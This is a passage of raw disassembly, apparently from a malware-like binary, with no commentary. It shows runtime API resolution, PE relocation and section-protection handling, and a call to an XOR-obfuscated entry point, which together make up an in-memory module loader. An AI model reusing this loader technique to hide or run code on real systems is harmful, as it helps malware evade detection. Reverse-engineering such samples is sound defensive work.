loc_4DA77A: ; CODE XREF: sub_4DA75D+40�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_4DA781: ; CODE XREF: sub_4DA75D+1B�j
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_4DA79F
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
push eax
call sub_4D186E
pop ecx
mov ecx, [ebp+var_8]
mov [ecx], al
jmp short loc_4DA77A
; ---------------------------------------------------------------------------
loc_4DA79F: ; CODE XREF: sub_4DA75D+2C�j
; sub_4DA75D:loc_4DA818�j
cmp [ebp+arg_0], 0
jz short loc_4DA81A
mov eax, [ebp+arg_0]
mov [ebp+var_C], eax
mov eax, [ebp+arg_0]
mov eax, [eax+8]
mov [ebp+arg_0], eax
mov eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_C]
mov eax, [eax]
mov [ebp+var_14], eax
loc_4DA7C2: ; CODE XREF: sub_4DA75D+97�j
mov eax, [ebp+var_14]
mov al, [eax]
mov [ebp+var_15], al
mov ecx, [ebp+var_10]
cmp al, [ecx]
jnz short loc_4DA7FC
cmp [ebp+var_15], 0
jz short loc_4DA7F6
mov eax, [ebp+var_14]
mov al, [eax+1]
mov [ebp+var_16], al
mov ecx, [ebp+var_10]
cmp al, [ecx+1]
jnz short loc_4DA7FC
add [ebp+var_14], 2
add [ebp+var_10], 2
cmp [ebp+var_16], 0
jnz short loc_4DA7C2
loc_4DA7F6: ; CODE XREF: sub_4DA75D+78�j
and [ebp+var_1C], 0
jmp short loc_4DA804
; ---------------------------------------------------------------------------
loc_4DA7FC: ; CODE XREF: sub_4DA75D+72�j
; sub_4DA75D+89�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
mov [ebp+var_1C], eax
loc_4DA804: ; CODE XREF: sub_4DA75D+9D�j
mov eax, [ebp+var_1C]
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jnz short loc_4DA818
mov eax, [ebp+var_C]
mov eax, [eax+4]
jmp short locret_4DA81C
; ---------------------------------------------------------------------------
loc_4DA818: ; CODE XREF: sub_4DA75D+B1�j
jmp short loc_4DA79F
; ---------------------------------------------------------------------------
loc_4DA81A: ; CODE XREF: sub_4DA75D+46�j
xor eax, eax
locret_4DA81C: ; CODE XREF: sub_4DA75D+B9�j
leave
retn
sub_4DA75D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DA81E proc near ; CODE XREF: sub_4DA8CF+86�p
; sub_4DB1E1+D8�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
and [ebp+var_8], 0
and [ebp+var_4], 0
movzx eax, ds:byte_4E6694
test eax, eax
jnz short loc_4DA87C
push offset dword_4E5C88
lea edx, [ebp+var_4]
mov ecx, [ebp+arg_0]
call sub_4D6AE2
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_4DA863
push offset dword_4E5C88
lea edx, [ebp+var_4]
mov ecx, [ebp+arg_0]
call sub_4D69D2
mov [ebp+var_8], eax
loc_4DA863: ; CODE XREF: sub_4DA81E+30�j
cmp [ebp+var_8], 0
jnz short loc_4DA87C
mov eax, [ebp+var_4]
mov [ebp+var_C], eax
push [ebp+var_C]
call sub_4DD3DD
pop ecx
and [ebp+var_4], 0
loc_4DA87C: ; CODE XREF: sub_4DA81E+17�j
; sub_4DA81E+49�j
cmp [ebp+arg_4], 0
jz short loc_4DA88C
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
jmp short loc_4DA89B
; ---------------------------------------------------------------------------
loc_4DA88C: ; CODE XREF: sub_4DA81E+62�j
mov eax, [ebp+var_4]
mov [ebp+var_10], eax
push [ebp+var_10]
call sub_4DD3DD
pop ecx
loc_4DA89B: ; CODE XREF: sub_4DA81E+6C�j
mov eax, [ebp+var_8]
leave
retn
sub_4DA81E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DA8A0 proc near ; CODE XREF: sub_4DABD7+41�p
; sub_4DABD7+37C�p ...
push ebp
mov ebp, esp
cmp ds:dword_4E695C, 0
jnz short loc_4DA8C2
push offset aKernel32_dll ; "kernel32.dll"
push offset aGetcurrentpr_0 ; "GetCurrentProcessId"
call sub_4DEC22
pop ecx
pop ecx
mov ds:dword_4E695C, eax
loc_4DA8C2: ; CODE XREF: sub_4DA8A0+A�j
call ds:dword_4E695C
xor eax, 0CABEFA10h
pop ebp
retn
sub_4DA8A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DA8CF proc near ; CODE XREF: sub_4DAAD2+C�p
; sub_4DFF8C+2B�p
var_34 = byte ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 34h
mov [ebp+var_34], dl
mov [ebp+var_30], ecx
push offset sub_4E0B0D
push ds:dword_4E67C0
push [ebp+var_30]
mov ecx, ds:dword_4E6954
call sub_4E0891
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_4DA94E
movzx eax, [ebp+var_34]
test eax, eax
jz short loc_4DA946
push 400h
call sub_4DD35A
pop ecx
mov [ebp+var_1C], eax
mov eax, [ebp+var_1C]
mov [ebp+var_10], eax
push 400h
push [ebp+var_10]
push [ebp+var_C]
call ds:dword_4E6714 ;; GetModuleFileNameA
test eax, eax
jz short loc_4DA937
push [ebp+var_10]
call ds:dword_4E675C ;; LoadLibraryA
loc_4DA937: ; CODE XREF: sub_4DA8CF+5D�j
mov eax, [ebp+var_10]
mov [ebp+var_20], eax
push [ebp+var_20]
call sub_4DD3DD
pop ecx
loc_4DA946: ; CODE XREF: sub_4DA8CF+34�j
mov eax, [ebp+var_C]
jmp locret_4DAA3F
; ---------------------------------------------------------------------------
loc_4DA94E: ; CODE XREF: sub_4DA8CF+2C�j
push 0
push 0
push [ebp+var_30]
call sub_4DA81E
add esp, 0Ch
mov [ebp+var_8], eax
and [ebp+var_4], 0
cmp [ebp+var_8], 0
jz short loc_4DA9B3
push 0
push 0
push [ebp+var_8]
call sub_4DD892
add esp, 0Ch
mov [ebp+var_14], eax
push [ebp+var_14]
call ds:dword_4E6718 ;; GetModuleHandleA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_4DA99F
movzx eax, [ebp+var_34]
test eax, eax
jz short loc_4DA99F
push [ebp+var_14]
call ds:dword_4E675C ;; LoadLibraryA
loc_4DA99F: ; CODE XREF: sub_4DA8CF+BD�j
; sub_4DA8CF+C5�j
mov eax, [ebp+var_14]
mov [ebp+var_24], eax
push [ebp+var_24]
call sub_4DD3DD
pop ecx
jmp loc_4DAA3C
; ---------------------------------------------------------------------------
loc_4DA9B3: ; CODE XREF: sub_4DA8CF+99�j
push [ebp+var_30]
call ds:dword_4E6718 ;; GetModuleHandleA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_4DAA3C
movzx eax, [ebp+var_34]
test eax, eax
jz short loc_4DAA3C
push 400h
call sub_4DD35A
pop ecx
mov [ebp+var_28], eax
mov eax, [ebp+var_28]
mov [ebp+var_18], eax
push 400h
push [ebp+var_18]
push [ebp+var_4]
call ds:dword_4E6714 ;; GetModuleFileNameA
test eax, eax
jz short loc_4DA9FF
push [ebp+var_18]
call ds:dword_4E675C ;; LoadLibraryA
loc_4DA9FF: ; CODE XREF: sub_4DA8CF+125�j
mov eax, [ebp+var_18]
mov [ebp+var_2C], eax
push [ebp+var_2C]
call sub_4DD3DD
pop ecx
push [ebp+var_30]
push [ebp+var_4]
call sub_4DA070
test eax, eax
jnz short loc_4DAA3C
call ds:dword_4E6710 ;; RtlGetLastWin32Error
test eax, eax
jnz short loc_4DAA2F
push 7Eh
call ds:dword_4E678C ;; RtlRestoreLastWin32Error
loc_4DAA2F: ; CODE XREF: sub_4DA8CF+156�j
push [ebp+var_4]
call ds:dword_4E66E0 ;; FreeLibrary
and [ebp+var_4], 0
loc_4DAA3C: ; CODE XREF: sub_4DA8CF+DF�j
; sub_4DA8CF+F4�j ...
mov eax, [ebp+var_4]
locret_4DAA3F: ; CODE XREF: sub_4DA8CF+7A�j
leave
retn
sub_4DA8CF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DAA41 proc near ; CODE XREF: sub_4E0076+4E�p
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004DAAC3 SIZE 0000000F BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4E3488
push offset sub_4D154C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 10h
push ebx
push esi
push edi
mov [ebp+var_28], ecx
push 105h
call sub_4DD35A
pop ecx
mov [ebp+var_20], eax
mov eax, [ebp+var_20]
mov [ebp+var_1C], eax
push 41h
pop ecx
xor eax, eax
mov edi, [ebp+var_1C]
rep stosd
stosb
and [ebp+var_4], 0
push 104h
push [ebp+var_1C]
push [ebp+var_28]
call ds:dword_4E6714 ;; GetModuleFileNameA
push [ebp+var_1C]
push [ebp+var_28]
call sub_4DA070
or [ebp+var_4], 0FFFFFFFFh
call sub_4DAAB3
jmp short loc_4DAAC3
sub_4DAA41 endp
; =============== S U B R O U T I N E =======================================
sub_4DAAB3 proc near ; CODE XREF: sub_4DAA41+6B�p
; DATA XREF: _5:004E3490�o
mov eax, [ebp-1Ch]
mov [ebp-24h], eax
push dword ptr [ebp-24h]
call sub_4DD3DD
pop ecx
retn
sub_4DAAB3 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4DAA41
loc_4DAAC3: ; CODE XREF: sub_4DAA41+70�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_4DAA41
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DAAD2 proc near ; CODE XREF: sub_4DFE2D+19�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov dl, 1
mov ecx, [ebp+var_4]
call sub_4DA8CF
leave
retn
sub_4DAAD2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DAAE5 proc near ; CODE XREF: sub_4DB1E1+5DB�p
; sub_4DB1E1+60F�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
xor edx, edx
div [ebp+arg_4]
mov [ebp+var_4], edx
cmp [ebp+var_4], 0
jz short loc_4DAB05
mov eax, [ebp+arg_0]
add eax, [ebp+arg_4]
sub eax, [ebp+var_4]
jmp short locret_4DAB08
; ---------------------------------------------------------------------------
loc_4DAB05: ; CODE XREF: sub_4DAAE5+13�j
mov eax, [ebp+arg_0]
locret_4DAB08: ; CODE XREF: sub_4DAAE5+1E�j
leave
retn
sub_4DAAE5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DAB0A proc near ; CODE XREF: sub_4DABD7+16C�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 24h
mov eax, [ebp+arg_0]
add eax, [ebp+arg_8]
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, [ebp+arg_8]
add eax, [ebp+arg_C]
mov [ebp+var_8], eax
loc_4DAB25: ; CODE XREF: sub_4DAB0A:loc_4DABD0�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jnb locret_4DABD5
mov eax, [ebp+var_4]
mov eax, [eax]
mov [ebp+var_14], eax
mov eax, [ebp+var_4]
add eax, 4
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov eax, [eax]
mov [ebp+var_10], eax
mov eax, [ebp+var_4]
add eax, 4
mov [ebp+var_4], eax
mov eax, [ebp+var_10]
sub eax, 8
mov [ebp+var_10], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
loc_4DAB65: ; CODE XREF: sub_4DAB0A+8B�j
; sub_4DAB0A+C4�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_C]
jnb short loc_4DABD0
mov eax, [ebp+var_4]
movzx eax, word ptr [eax]
and eax, 0FFFh
mov [ebp+var_24], eax
mov eax, [ebp+var_4]
movzx eax, word ptr [eax]
sar eax, 0Ch
mov [ebp+var_1C], eax
mov eax, [ebp+var_4]
inc eax
inc eax
mov [ebp+var_4], eax
cmp [ebp+var_1C], 0
jnz short loc_4DAB97
jmp short loc_4DAB65
; ---------------------------------------------------------------------------
loc_4DAB97: ; CODE XREF: sub_4DAB0A+89�j
cmp [ebp+var_1C], 3
jz short loc_4DABA7
mov ecx, 0EF000016h
call sub_4DD342
loc_4DABA7: ; CODE XREF: sub_4DAB0A+91�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_14]
add eax, [ebp+var_24]
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
sub ecx, [eax+34h]
mov eax, [ebp+var_20]
mov eax, [eax]
add eax, ecx
mov [ebp+var_18], eax
mov eax, [ebp+var_20]
mov ecx, [ebp+var_18]
mov [eax], ecx
jmp short loc_4DAB65
; ---------------------------------------------------------------------------
loc_4DABD0: ; CODE XREF: sub_4DAB0A+61�j
jmp loc_4DAB25
; ---------------------------------------------------------------------------
locret_4DABD5: ; CODE XREF: sub_4DAB0A+21�j
leave
retn
sub_4DAB0A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DABD7 proc near ; DATA XREF: sub_4DB1E1+C01�o
var_7C = dword ptr -7Ch
var_78 = byte ptr -78h
var_74 = dword ptr -74h
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
; FUNCTION CHUNK AT 004DB113 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004DB128 SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4E3498
push offset sub_4D154C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 7Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_1C], 0
and [ebp+var_4], 0
cmp [ebp+arg_10], 1
jnz loc_4DAF4D
mov [ebp+var_4], 1
call sub_4DA8A0
mov ecx, [ebp+arg_8]
xor ecx, eax
mov [ebp+arg_8], ecx
mov eax, [ebp+arg_C]
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov ecx, [ebp+var_24]
add ecx, [eax+3Ch]
mov [ebp+var_40], ecx
mov eax, [ebp+var_40]
movzx eax, word ptr [eax+14h]
mov ecx, [ebp+var_40]
lea eax, [ecx+eax+18h]
mov [ebp+var_34], eax
mov eax, [ebp+var_40]
movzx eax, word ptr [eax+6]
imul eax, 28h
mov ecx, [ebp+var_34]
lea eax, [ecx+eax-28h]
mov [ebp+var_28], eax
mov eax, [ebp+var_28]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_24]
mov eax, [ecx+eax+34h]
mov [ebp+var_44], eax
mov eax, [ebp+var_28]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_24]
mov eax, [ecx+eax+38h]
mov [ebp+var_2C], eax
mov eax, [ebp+var_28]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_24]
mov eax, [ecx+eax+3Ch]
mov [ebp+var_30], eax
mov eax, [ebp+var_28]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_24]
mov eax, [ecx+eax+40h]
mov [ebp+var_38], eax
mov eax, [ebp+var_28]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_24]
lea eax, [ecx+eax+44h]
mov [ebp+var_3C], eax
jmp short loc_4DACB7
; ---------------------------------------------------------------------------
loc_4DACAE: ; CODE XREF: sub_4DABD7:loc_4DAD2A�j
mov eax, [ebp+var_34]
add eax, 28h
mov [ebp+var_34], eax
loc_4DACB7: ; CODE XREF: sub_4DABD7+D5�j
mov eax, [ebp+var_34]
cmp eax, [ebp+var_28]
jnb short loc_4DAD2C
mov eax, [ebp+var_3C]
mov eax, [eax]
mov [ebp+var_50], eax
mov eax, [ebp+var_3C]
add eax, 4
mov [ebp+var_3C], eax
mov eax, [ebp+var_3C]
mov eax, [eax]
mov [ebp+var_4C], eax
mov eax, [ebp+var_3C]
add eax, 4
mov [ebp+var_3C], eax
mov eax, [ebp+var_3C]
add eax, 4
mov [ebp+var_3C], eax
push 0
push 0
push [ebp+var_50]
push [ebp+arg_0]
call sub_4D5421
lea eax, [ebp+var_48]
push eax
push 0
push 0
push [ebp+var_4C]
mov eax, [ebp+var_34]
mov ecx, [ebp+var_24]
add ecx, [eax+0Ch]
push ecx
push [ebp+arg_0]
call sub_4D6177
test eax, eax
jz short loc_4DAD20
cmp [ebp+var_48], 0
jnz short loc_4DAD2A
loc_4DAD20: ; CODE XREF: sub_4DABD7+141�j
mov ecx, 0EF00000Fh
call sub_4DD342
loc_4DAD2A: ; CODE XREF: sub_4DABD7+147�j
jmp short loc_4DACAE
; ---------------------------------------------------------------------------
loc_4DAD2C: ; CODE XREF: sub_4DABD7+E6�j
mov eax, [ebp+var_40]
mov eax, [eax+34h]
cmp eax, [ebp+var_24]
jz short loc_4DAD4B
push [ebp+var_2C]
push [ebp+var_44]
push [ebp+var_40]
push [ebp+var_24]
call sub_4DAB0A
add esp, 10h
loc_4DAD4B: ; CODE XREF: sub_4DABD7+15E�j
push 5Ch
push [ebp+arg_4]
call sub_4D1700
pop ecx
pop ecx
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jnz short loc_4DAD68
mov eax, [ebp+arg_4]
mov [ebp+var_20], eax
jmp short loc_4DAD6F
; ---------------------------------------------------------------------------
loc_4DAD68: ; CODE XREF: sub_4DABD7+187�j
mov eax, [ebp+var_20]
inc eax
mov [ebp+var_20], eax
loc_4DAD6F: ; CODE XREF: sub_4DABD7+18F�j
cmp [ebp+var_30], 0
jz short loc_4DAD97
mov eax, [ebp+var_24]
add eax, [ebp+var_30]
mov [ebp+var_54], eax
push [ebp+var_38]
push 1
push [ebp+var_20]
push [ebp+var_40]
push [ebp+var_24]
push [ebp+var_54]
call sub_4D9D70
add esp, 18h
loc_4DAD97: ; CODE XREF: sub_4DABD7+19C�j
mov eax, ds:dword_4E6954
mov [ebp+var_74], eax
cmp [ebp+var_74], 0
jz short loc_4DADB8
mov eax, [ebp+var_74]
add eax, 10h
push eax
call ds:dword_4E301C ;; RtlEnterCriticalSection
mov [ebp+var_78], 1
jmp short loc_4DADBC
; ---------------------------------------------------------------------------
loc_4DADB8: ; CODE XREF: sub_4DABD7+1CC�j
and [ebp+var_78], 0
loc_4DADBC: ; CODE XREF: sub_4DABD7+1DF�j
movzx eax, [ebp+var_78]
test eax, eax
jz short loc_4DADFB
push offset sub_4E0B0D
push ds:dword_4E67C0
push [ebp+arg_C]
push [ebp+var_20]
mov ecx, ds:dword_4E6954
call sub_4E09B1
mov eax, ds:dword_4E6954
mov [ebp+var_7C], eax
cmp [ebp+var_7C], 0
jz short loc_4DADFB
mov eax, [ebp+var_7C]
add eax, 10h
push eax
call ds:dword_4E3018 ;; RtlLeaveCriticalSection
loc_4DADFB: ; CODE XREF: sub_4DABD7+1EB�j
; sub_4DABD7+215�j
push [ebp+arg_4]
push [ebp+arg_C]
mov ecx, ds:dword_4E694C
call sub_4E098E
cmp ds:dword_4E6680, 2
jb loc_4DAF35
mov eax, [ebp+var_40]
movzx eax, word ptr [eax+14h]
mov ecx, [ebp+var_40]
lea eax, [ecx+eax+18h]
mov [ebp+var_34], eax
and [ebp+var_58], 0
lea eax, [ebp+var_58]
push eax
push 4
mov eax, [ebp+var_28]
sub eax, [ebp+var_34]
cdq
push 28h
pop ecx
idiv ecx
push eax
push [ebp+var_34]
call ds:dword_4E67AC ;; VirtualProtect
mov eax, [ebp+var_28]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_24]
lea eax, [ecx+eax+44h]
mov [ebp+var_3C], eax
jmp short loc_4DAE65
; ---------------------------------------------------------------------------
loc_4DAE5C: ; CODE XREF: sub_4DABD7+32B�j
mov eax, [ebp+var_34]
add eax, 28h
mov [ebp+var_34], eax
loc_4DAE65: ; CODE XREF: sub_4DABD7+283�j
mov eax, [ebp+var_34]
cmp eax, [ebp+var_28]
jnb loc_4DAF07
mov eax, [ebp+var_3C]
add eax, 8
mov [ebp+var_3C], eax
mov eax, [ebp+var_3C]
mov eax, [eax]
mov [ebp+var_60], eax
mov eax, [ebp+var_3C]
add eax, 4
mov [ebp+var_3C], eax
mov eax, [ebp+var_34]
mov ecx, [ebp+var_60]
mov [eax+24h], ecx
and [ebp+var_5C], 0
mov eax, [ebp+var_60]
and eax, 20000000h
test eax, eax
jz short loc_4DAEC2
mov eax, [ebp+var_60]
and eax, 80000000h
test eax, eax
jz short loc_4DAEB9
mov [ebp+var_5C], 40h
jmp short loc_4DAEC0
; ---------------------------------------------------------------------------
loc_4DAEB9: ; CODE XREF: sub_4DABD7+2D7�j
mov [ebp+var_5C], 20h
loc_4DAEC0: ; CODE XREF: sub_4DABD7+2E0�j
jmp short loc_4DAEDE
; ---------------------------------------------------------------------------
loc_4DAEC2: ; CODE XREF: sub_4DABD7+2CB�j
mov eax, [ebp+var_60]
and eax, 80000000h
test eax, eax
jz short loc_4DAED7
mov [ebp+var_5C], 4
jmp short loc_4DAEDE
; ---------------------------------------------------------------------------
loc_4DAED7: ; CODE XREF: sub_4DABD7+2F5�j
mov [ebp+var_5C], 2
loc_4DAEDE: ; CODE XREF: sub_4DABD7:loc_4DAEC0�j
; sub_4DABD7+2FE�j
lea eax, [ebp+var_60]
push eax
push [ebp+var_5C]
mov eax, [ebp+var_34]
mov ecx, [ebp+var_34]
mov eax, [eax+34h]
sub eax, [ecx+0Ch]
push eax
mov eax, [ebp+var_34]
mov ecx, [ebp+var_24]
add ecx, [eax+0Ch]
push ecx
call ds:dword_4E67AC ;; VirtualProtect
jmp loc_4DAE5C
; ---------------------------------------------------------------------------
loc_4DAF07: ; CODE XREF: sub_4DABD7+294�j
mov eax, [ebp+var_40]
movzx eax, word ptr [eax+14h]
mov ecx, [ebp+var_40]
lea eax, [ecx+eax+18h]
mov [ebp+var_34], eax
lea eax, [ebp+var_58]
push eax
push [ebp+var_58]
mov eax, [ebp+var_28]
sub eax, [ebp+var_34]
cdq
push 28h
pop ecx
idiv ecx
push eax
push [ebp+var_34]
call ds:dword_4E67AC ;; VirtualProtect
loc_4DAF35: ; CODE XREF: sub_4DABD7+23C�j
and [ebp+var_4], 0
jmp short loc_4DAF4B
; ---------------------------------------------------------------------------
loc_4DAF3B: ; DATA XREF: _5:004E34A8�o
push [ebp+var_14]
call sub_4DDC27
retn
; ---------------------------------------------------------------------------
loc_4DAF44: ; DATA XREF: _5:004E34AC�o
mov esp, [ebp+var_18]
and [ebp+var_4], 0
loc_4DAF4B: ; CODE XREF: sub_4DABD7+362�j
jmp short loc_4DAF6F
; ---------------------------------------------------------------------------
loc_4DAF4D: ; CODE XREF: sub_4DABD7+34�j
cmp [ebp+arg_10], 0
jnz short loc_4DAF62
call sub_4DA8A0
mov ecx, [ebp+arg_8]
xor ecx, eax
mov [ebp+arg_8], ecx
jmp short loc_4DAF6F
; ---------------------------------------------------------------------------
loc_4DAF62: ; CODE XREF: sub_4DABD7+37A�j
call sub_4DA8A0
mov ecx, [ebp+arg_8]
xor ecx, eax
mov [ebp+arg_8], ecx
loc_4DAF6F: ; CODE XREF: sub_4DABD7:loc_4DAF4B�j
; sub_4DABD7+389�j
cmp [ebp+arg_8], 0
jz loc_4DB115
mov eax, [ebp+arg_C]
add eax, [ebp+arg_8]
mov [ebp+var_64], eax
mov ds:dword_4E6928, 0FFFFFFFEh
mov eax, ds:dword_4E6960
mov [ebp+var_68], eax
mov [ebp+var_4], 2
pushaw
mov ds:dword_4E6960, esp
mov eax, [ebp+arg_14]
push eax
mov eax, [ebp+arg_10]
push eax
mov eax, [ebp+arg_C]
push eax
call [ebp+var_64]
mov ds:dword_4E6928, eax
mov esp, ds:dword_4E6960
popaw
and [ebp+var_4], 0
call sub_4DAFCD
jmp loc_4DB113
sub_4DABD7 endp
; =============== S U B R O U T I N E =======================================
sub_4DAFCD proc near ; CODE XREF: sub_4DABD7+3EC�p
; DATA XREF: _5:004E34B8�o
mov eax, [ebp-68h]
mov ds:dword_4E6960, eax
cmp dword ptr [ebp+18h], 0
jnz loc_4DB0F6
mov eax, ds:dword_4E694C
mov [ebp-80h], eax
cmp dword ptr [ebp-80h], 0
jz short loc_4DB003
mov eax, [ebp-80h]
add eax, 10h
push eax
call ds:dword_4E301C ;; RtlEnterCriticalSection
mov byte ptr [ebp-84h], 1
jmp short loc_4DB00A
; ---------------------------------------------------------------------------
loc_4DB003: ; CODE XREF: sub_4DAFCD+1E�j
and byte ptr [ebp-84h], 0
loc_4DB00A: ; CODE XREF: sub_4DAFCD+34�j
movzx eax, byte ptr [ebp-84h]
test eax, eax
jz short loc_4DB047
push dword ptr [ebp+14h]
mov ecx, ds:dword_4E694C
call sub_4E08E0
mov eax, ds:dword_4E694C
mov [ebp-88h], eax
cmp dword ptr [ebp-88h], 0
jz short loc_4DB047
mov eax, [ebp-88h]
add eax, 10h
push eax
call ds:dword_4E3018 ;; RtlLeaveCriticalSection
loc_4DB047: ; CODE XREF: sub_4DAFCD+46�j
; sub_4DAFCD+68�j
push 5Ch
push dword ptr [ebp+0Ch]
call sub_4D1700
pop ecx
pop ecx
mov [ebp-6Ch], eax
cmp dword ptr [ebp-6Ch], 0
jnz short loc_4DB064
mov eax, [ebp+0Ch]
mov [ebp-6Ch], eax
jmp short loc_4DB06B
; ---------------------------------------------------------------------------
loc_4DB064: ; CODE XREF: sub_4DAFCD+8D�j
mov eax, [ebp-6Ch]
inc eax
mov [ebp-6Ch], eax
loc_4DB06B: ; CODE XREF: sub_4DAFCD+95�j
mov eax, ds:dword_4E6954
mov [ebp-8Ch], eax
cmp dword ptr [ebp-8Ch], 0
jz short loc_4DB098
mov eax, [ebp-8Ch]
add eax, 10h
push eax
call ds:dword_4E301C ;; RtlEnterCriticalSection
mov byte ptr [ebp-90h], 1
jmp short loc_4DB09F
; ---------------------------------------------------------------------------
loc_4DB098: ; CODE XREF: sub_4DAFCD+B0�j
and byte ptr [ebp-90h], 0
loc_4DB09F: ; CODE XREF: sub_4DAFCD+C9�j
movzx eax, byte ptr [ebp-90h]
test eax, eax
jz short loc_4DB0E7
push offset sub_4E0B0D
push ds:dword_4E67C0
push dword ptr [ebp-6Ch]
mov ecx, ds:dword_4E6954
call sub_4E0900
mov eax, ds:dword_4E6954
mov [ebp-94h], eax
cmp dword ptr [ebp-94h], 0
jz short loc_4DB0E7
mov eax, [ebp-94h]
add eax, 10h
push eax
call ds:dword_4E3018 ;; RtlLeaveCriticalSection
loc_4DB0E7: ; CODE XREF: sub_4DAFCD+DB�j
; sub_4DAFCD+108�j
mov eax, [ebp+0Ch]
mov [ebp-70h], eax
push dword ptr [ebp-70h]
call sub_4DD3DD
pop ecx
loc_4DB0F6: ; CODE XREF: sub_4DAFCD+C�j
mov eax, ds:dword_4E6928
mov [ebp-1Ch], eax
mov ds:dword_4E6928, 0FFFFFFFEh
cmp dword ptr [ebp-1Ch], 0FFFFFFFEh
jnz short locret_4DB112
and dword ptr [ebp-1Ch], 0
locret_4DB112: ; CODE XREF: sub_4DAFCD+13F�j
retn
sub_4DAFCD endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4DABD7
loc_4DB113: ; CODE XREF: sub_4DABD7+3F1�j
jmp short loc_4DB11C
; ---------------------------------------------------------------------------
loc_4DB115: ; CODE XREF: sub_4DABD7+39C�j
mov [ebp+var_1C], 1
loc_4DB11C: ; CODE XREF: sub_4DABD7:loc_4DB113�j
or [ebp+var_4], 0FFFFFFFFh
call nullsub_1
jmp short loc_4DB128
; END OF FUNCTION CHUNK FOR sub_4DABD7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
